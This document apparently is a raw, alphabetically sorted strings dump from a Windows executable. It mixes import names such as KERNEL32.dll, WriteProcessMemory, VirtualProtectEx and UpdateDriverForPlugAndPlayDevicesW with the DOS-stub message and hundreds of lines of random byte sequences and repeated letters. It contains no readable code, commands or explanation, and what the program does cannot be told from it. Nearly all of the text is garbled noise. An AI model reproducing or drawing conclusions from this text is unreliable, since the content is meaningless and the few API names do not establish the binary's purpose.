GlobalUnlock
GPiVB/
grmM6|)8
g~sNMtN4p
GT;hJ$
Gt,vlF
@@<GyJ:_
  <g~Z
H,@@)#
+ HGbuVBj
h~GNB|i
=_~Hhd
hhhhhh\\
HHHHHHHeeeee^^^^^^^^^^^^^^^fffffffff
hI=bQq
H!MA0%
hP2M6r
hPm4dE
 @HsS.
huB0dLk2!
'HxtV?
i& `69
}I{)9'm+
"` I)b
 `i<E(
i)H?J(
IIIIIIII
iiiiiiiiiii-----
IIIIIIIIIIIIId
iiiiiiiiiPPPPP
I-MI<J
i.` Wg
I{yL20
J_24~=\
J^9M;r
``je#qk9
JJJJJJJ
JJJJJJJJ^^^^%%%%%
jjjjjjjjj
JJJJJJJJJJJJJJJJJJ
JJJJpppppp
jjjMMMmmmm
?JM5sL3vY-
jO#e74
><jP\#
j(r'e^
(jrR]_4D
jx;N&i!
KERNEL32.dll
#>kES.
KezH	Il
KKKKKK
kkkkkkkkGGGGGGGGG
kkkkkkkkk
KKxxxxxxxkkkkkkkk
+kN24M
K%oKUo
``Kp/ 
Kp~E=o
@`-krD
ksZYd*
L>1l"5,
^L:Am?
\_Lec}
 LG'"@
L?hPAPI
+LLLLL
lllllllll
LLLLLLLLL
lllluuuuuuVVV
L*OeYrn;
l?'x|aPp
LY!!%)t0W;
@ M)4L
MC44y-
M?HXqr
___MMMiiiiiiiiiii
mmmmDDDD
mmmmmBBBUUUUUU
mmmmmm
mmmmmmm
mmmmmmmm
{{{{{{{{mmOOO
n!!!!!!
n\\\\\\\\\\\\\
;\{-\N
*N}"?2
.N4DAt=
`@>na/
N^c& @
NdrByteCountPointerFree
newdev.dll
nFc-%~
nnnc****
;;;;;;;;;;;>>nnnn
nnnnnn
NNNNNNN
NNNNNNNN33hhW\\
NNNNNNNNN
;;;;;;;;;;;nnnnnnnnnnnn
NNNNNNNNNNNN`````
NNNNNNNNNQQQQ
&]nV){&
'}NvyX
n!W6y~
O@6d~x
$\O bN
oHKHc]Z
ohnfj;
??OOOOOOOOOOOhhhhhhh
OOOOOOOOOOOOO
oTwU@*
P-,`@*
@" `p7
PaQo"$
PathAppendW
PathCombineW
PathFileExistsW
PathRemoveFileSpecW
pjNj9{
 /!PML^
P\NVZ41u
pO6OCM
pppppp
P)R?jN
p |z5(
 p}zI!
q3esM#
q^)B5=QJ
?{q$Bm
q{*  C6
Qf<U& `
-Qhh|"
qn]I ##
$$$$$$$$$qqqq44444
[[[[[[[[[[[[[[[[[[[[[[qqqqqjjjjj
qqqqqq
QQQQQQ
qqqqqqq888888888888888888H
Q?<)R6
q/UUUUUUUUU*********
Qv5C0W
^q+WFb
Qwf%MP
Q{(` x
qZWy|{B0TPA{P9x
\rbs7M``
`.rdata
@^RD$``H
 rD-HHi
.reloc
rk$	&	/%:
Rm6EHo
@@. @RNR
RPCRT4.dll
rrC'{XjK
R:;rDx6P
RRIIIII
rrrrrrr
rrrrrrrrrrrrrrrr
}r,  u4G?'
}s7eUj
.  sC-
SetLastError
SetLocaleInfoW
SHGetValueW
SHLWAPI.dll
,,,,,,,,,,SSSS
ssssss
ssssssssrrrrrrrr
SSSSSSSSS
sssssssss1111R
SSSSSSSSSSSSSSSS********
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~t
---------T
tbv_z7XbbE
 @t;cM]
@T\DfE
>TFb2_
tf@sKt
!This program cannot be run in DOS mode.
ThRS9`
timeEndPeriod
TlsSetValue
=[t{O!
tP-?=X
tt]?Al
ttt<<<<<<<<<<<<
TTT((((((((((
}tttttt
tttttttt!AAA
tttttttttttt-------
ttttttttttttttttttttttvvv
U6H3lM"@
Uc't+#/
UpdateDriverForPlugAndPlayDevicesW
UuidCreate
!uurHy-
uuuuummmmmmmmmmmmmmmmmmV
UUUUUU
UUUUUUUUU
........uuuuuuuuuuuuuuu
UxF=^Ad
V#############
.~"v2I
v[|3MW
 `v5A}N%J
V~d4KY
VirtualProtectEx
v(@ kXd
VNpWHcWJ
_vpj7;
vvvvvv
VVVVVVVV
VVVVVVVVV
vvvvvvvvvvvv
VVVVVVVVVVVVVVVVV
VVVVVVVVVVVVVVVVVVVVVVV::::::::::::::::::
vX!LI-VJ
` @@vy
WaitForSingleObject
Wbr.P?
wf?2/N
WP&``"@
WriteProcessMemory
~W`UV5xVg
WWWNNN7GG
WWWWW8888
wwwwww2
wwwwwww
wwwwwww))))))))))
wwwwwwww
WWWWWWWWWW
WWWWWWWWWWWWWWW
{@Wy{1
@`x1$@
X*@ %4
XC,@ <
!XJ_%9
xo*``4
)Xr0+it
-x)UH-
xxxx)))
xxxxxx
xxxxxxxx5
xxxxxxxxxxxxxx/////////sssssss
xxxxxxxxxxxxxxxxxxxxxx
xZP~j/
YgWA+{
([Ynh;
>y,@@Oe
	<ySFH
, `YY/
YYYYYuuuuuuuVVVV
YYYYYY					
      z
"z,7SX
z:b&*E
!zBW	I
zCf5w!
Z!f~>Xc
??z!H	
z\hY:ku
/z^iZ{n
 Z|L_j
ZtRHhP^
z|VMh)tKl
Z)/wI" 
zzzzzzzz
zzzzzzzzzzzzzzzdddddddd//
zzzzzzzzzzzzzzzzzzzzzz\\\